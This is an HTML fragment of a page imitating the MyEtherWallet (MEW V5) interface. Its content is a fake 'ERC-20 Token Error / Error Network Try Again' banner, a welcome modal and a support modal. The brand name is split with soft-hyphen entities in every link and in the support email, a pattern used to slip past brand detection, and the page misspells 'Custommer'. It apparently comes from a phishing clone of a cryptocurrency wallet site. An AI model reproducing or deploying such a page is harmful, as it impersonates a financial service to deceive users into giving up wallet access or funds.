            한국어
          </li><li data-v-161928e6="" data-language-code="ru_RU" data-flag-name="ru">
            Русский
          </li><li data-v-161928e6="" data-language-code="zh_CN" data-flag-name="zh-Hans">
            简体中文
          </li><li data-v-161928e6="" data-language-code="zh_TW" data-flag-name="tw">
            繁體中文
          </li></ul></div></div><div data-v-2a33716a="" class="mobile-menu-header"><a data-v-2a33716a="" href="#/" class="router-link-exact-active router-link-active"><div data-v-2a33716a="" class="logo-image--container"><img data-v-2a33716a="" src="img/short-hand-logo.5d962d4e.png" class="logo"></div></a></div><div data-v-2a33716a="" class="mobile-menu-shadow-backdrop"></div><div data-v-2a33716a="" class="mobile-menu-content--container"><div data-v-2a33716a="" class="mobile-menu-content"><!----><ul data-v-2a33716a=""><li data-v-2a33716a=""><a data-v-2a33716a="" href="#/" class="router-link-exact-active router-link-active"><div data-v-2a33716a="" class="menu-link-block"><div data-v-2a33716a="">Home</div><i data-v-2a33716a="" aria-hidden="true" class="fa fa-angle-right"></i></div></a></li><li data-v-2a33716a=""><a data-v-2a33716a="" href="#/#about-mew" class=""><div data-v-2a33716a="" class="menu-link-block"><div data-v-2a33716a="">About</div><i data-v-2a33716a="" aria-hidden="true" class="fa fa-angle-right"></i></div></a></li><li data-v-2a33716a=""><a data-v-2a33716a="" href="#/#faqs" class=""><div data-v-2a33716a="" class="menu-link-block"><div data-v-2a33716a="">FAQs</div><i data-v-2a33716a="" aria-hidden="true" class="fa fa-angle-right"></i></div></a></li><li data-v-2a33716a=""><div data-v-2a33716a="" class="menu-link-block"><div data-v-2a33716a="">Language</div><div data-v-2a33716a="" class="selected-lang"><div data-v-2a33716a="">English</div><img data-v-2a33716a="" src="img/en.2e9c71c7.svg"></div><i data-v-2a33716a="" aria-hidden="true" class="fa fa-angle-right"></i></div></li><!----></ul><!----></div></div></div><div data-v-0049b9b4="" class="fixed-header-wrap"><div data-v-0049b9b4="" class="fixed-header"><div data-v-0049b9b4="" class="vintage-header">
            Missing the vintage MEW?
            <a data-v-0049b9b4="" rel="noopener noreferrer" href="https://vintage.My&shy;&shy;Et&shy;&shy;he&shy;&shy;rW&shy;&shy;a&shy;&shy;ll&shy;&shy;et.com">Click here to go back!</a></div><div data-v-0049b9b4="" class="page-container"><div data-v-0049b9b4="" class="header-container"><a data-v-0049b9b4="" href="#/" class="router-link-exact-active router-link-active"><div data-v-0049b9b4="" class="top-logo"><img data-v-0049b9b4="" src="img/short-hand-logo.5d962d4e.png" class="logo-large"></div></a><div data-v-0049b9b4="" class="top-menu"><ul data-v-0049b9b4="" class="nav"><li data-v-0049b9b4="" class="nav-item buy-eth"><a data-v-0049b9b4="" rel="noopener" target="_blank" href="https://ccswap.My&shy;&shy;Et&shy;&shy;he&shy;&shy;rW&shy;&shy;a&shy;&shy;ll&shy;&shy;et.com/#/" class="nav-link"><img data-v-0049b9b4="" src="img/buy-eth.75fcd9b0.svg" class="buy-eth-icon">
                    Buy Eth
                  </a></li><li data-v-0049b9b4="" class="nav-item"><a data-v-0049b9b4="" href="#/" class="nav-link router-link-exact-active router-link-active" target="_self">Home</a></li><li data-v-0049b9b4="" class="nav-item"><a data-v-0049b9b4="" href="#/#about-mew" class="nav-link" target="_self">
                    About
                  </a></li><!----><li data-v-0049b9b4="" class="nav-item"><a data-v-0049b9b4="" href="#/#faqs" class="nav-link" target="_self">FAQs</a></li><div data-v-0049b9b4="" class="language-menu-container"><div data-v-0049b9b4="" class="arrows"><i data-v-0049b9b4="" aria-hidden="true" class="fa fa-angle-down"></i></div><li data-v-0049b9b4="" class="language-menu nav-item b-nav-dropdown dropdown" id="__BVID__48"><a href="#" aria-haspopup="true" aria-expanded="false" class="nav-link dropdown-toggle nav-link-custom" id="__BVID__48__BV_button_"><div data-v-0049b9b4="" class="current-language-flag"><img data-v-0049b9b4="" src="img/en.2e9c71c7.svg" class="show"><p data-v-0049b9b4="">English</p></div></a><ul tabindex="-1" class="dropdown-menu dropdown-menu-right" aria-labelledby="__BVID__48__BV_button_"><li data-v-0049b9b4="" data-language-code="en_US" data-flag-name="en"><a role="menuitem" target="_self" href="#" class="dropdown-item active">English</a></li><li data-v-0049b9b4="" data-language-code="es_ES" data-flag-name="es"><a role="menuitem" target="_self" href="#" class="dropdown-item">Español</a></li><li data-v-0049b9b4="" data-language-code="ja_JP" data-flag-name="ja"><a role="menuitem" target="_self" href="#" class="dropdown-item">日本語</a></li><li data-v-0049b9b4="" data-language-code="ko_KR" data-flag-name="ko"><a role="menuitem" target="_self" href="#" class="dropdown-item">한국어</a></li><li data-v-0049b9b4="" data-language-code="ru_RU" data-flag-name="ru"><a role="menuitem" target="_self" href="#" class="dropdown-item">Русский</a></li><li data-v-0049b9b4="" data-language-code="zh_CN" data-flag-name="zh-Hans"><a role="menuitem" target="_self" href="#" class="dropdown-item">简体中文</a></li><li data-v-0049b9b4="" data-language-code="zh_TW" data-flag-name="tw"><a role="menuitem" target="_self" href="#" class="dropdown-item">繁體中文</a></li></ul></li></div><!----><!----><!----><!----></ul></div></div></div></div></div></div><div data-v-44496a32="" class="bootstrap-modal nopadding"><div id="__BVID__57___BV_modal_outer_" style="position: absolute; z-index: 1040;"><div role="dialog" tabindex="-1" aria-hidden="true" class="modal fade" id="__BVID__57" style="display: none;"><div class="modal-dialog modal-md modal-dialog-centered"><div role="document" class="modal-content" id="__BVID__57___BV_modal_content_" aria-describedby="__BVID__57___BV_modal_body_"><!----><div class="modal-body" id="__BVID__57___BV_modal_body_"><div data-v-44496a32="" class="welcome-modal"><img data-v-44496a32="" src="img/garlands.85590a8d.png"><div data-v-44496a32="" class="welcome-modal-container"><div data-v-44496a32="" class="welcome-modal-text"><h3 data-v-44496a32="">Welcome to MEW V5</h3><p data-v-44496a32="" for="home.welcomeToLink1">Welcome to the brand new MEW! If this is your first time visiting, check out our <a data-v-44496a32="" href="https://medium.com/@My&shy;&shy;Et&shy;&shy;he&shy;&shy;rW&shy;&shy;a&shy;&shy;ll&shy;&shy;et/lets-make-it-official-mew5-My&shy;&shy;Et&shy;&shy;he&shy;&shy;rW&shy;&shy;a&shy;&shy;ll&shy;&shy;et-s-all-new-interface-is-here-2063117180a4" target="_blank" rel="noopener noreferrer">Medium article on what's new</a>.</p><p data-v-44496a32="" for="home.welcomeToLink2">Vintage MEW can still be accessed <a data-v-44496a32="" href="https://vintage.My&shy;&shy;Et&shy;&shy;he&shy;&shy;rW&shy;&shy;a&shy;&shy;ll&shy;&shy;et.com" target="_blank" rel="noopener noreferrer">here</a>, or at the bottom of the page.</p></div><div data-v-44496a32="" class="welcome-modal-button"><button data-v-44496a32="">Onwards!</button></div></div></div></div><!----></div></div></div><!----><!----></div></div><div data-v-1d4ff7a8="" class="home"><div data-v-149787f6="" data-v-1d4ff7a8="" class="top-banner"></div><div data-v-467df702="" data-v-1d4ff7a8="" class="about-mew"><div data-v-467df702="" class="wrap"><div data-v-467df702="" class="top-section"><div data-v-467df702="" class="circle"></div><div data-v-467df702="" id="about-mew" class="star-background"><div data-v-467df702="" class="page-container"><div data-v-467df702="" class="flex-col-1-1-vertical-center content"><div data-v-467df702="" class="text-content"><h2 data-v-467df702="">ERC-20 Token Error</h2><h3 data-v-467df702="" class="color-white" style="
        color: red;
    ">Error Network Try Again</h3></div><div data-v-467df702="" class="image-content"><img data-v-467df702="" src="img/mew-icon.de3130df.png" class="mew-icon"></div><div data-v-467df702="" class="animation-content"><img data-v-467df702="" src="img/spaceman.95f84509.png" class="spaceman"></div></div></div></div></div></div></div></div><div data-v-443293fa="" class="footer"><div data-v-254ca084="" data-v-443293fa="" class="modal-container"><div data-v-254ca084="" class="bootstrap-modal"><div id="__BVID__71___BV_modal_outer_" style="position: absolute; z-index: 1040;"><div role="dialog" tabindex="-1" aria-hidden="true" class="modal fade" id="__BVID__71" style="display: none;"><div class="modal-dialog modal-md modal-dialog-centered"><div role="document" class="modal-content" id="__BVID__71___BV_modal_content_" aria-labelledby="__BVID__71___BV_modal_header_" aria-describedby="__BVID__71___BV_modal_body_"><header class="modal-header" id="__BVID__71___BV_modal_header_"><h5 class="modal-title">Feedback / Custommer Support</h5><button type="button" aria-label="Close" class="close">×</button></header><div class="modal-body" id="__BVID__71___BV_modal_body_"><div data-v-254ca084="" class="modal-content">
          If you want to send us your feedback, please use
          <a data-v-254ca084="" href="mailto:support@My&shy;&shy;Et&shy;&shy;he&shy;&shy;rW&shy;&shy;a&shy;&shy;ll&shy;&shy;et.com" target="_blank" rel="noopener noreferrer">support@My&shy;&shy;Et&shy;&shy;he&shy;&shy;rW&shy;&shy;a&shy;&shy;ll&shy;&shy;et.com</a>. Thank you.
        </div></div><!----></div></div></div><!----><!----></div></div></div></div><!----></div>
    
    
    
    
    
    
    
    
    
    </body>
    </html>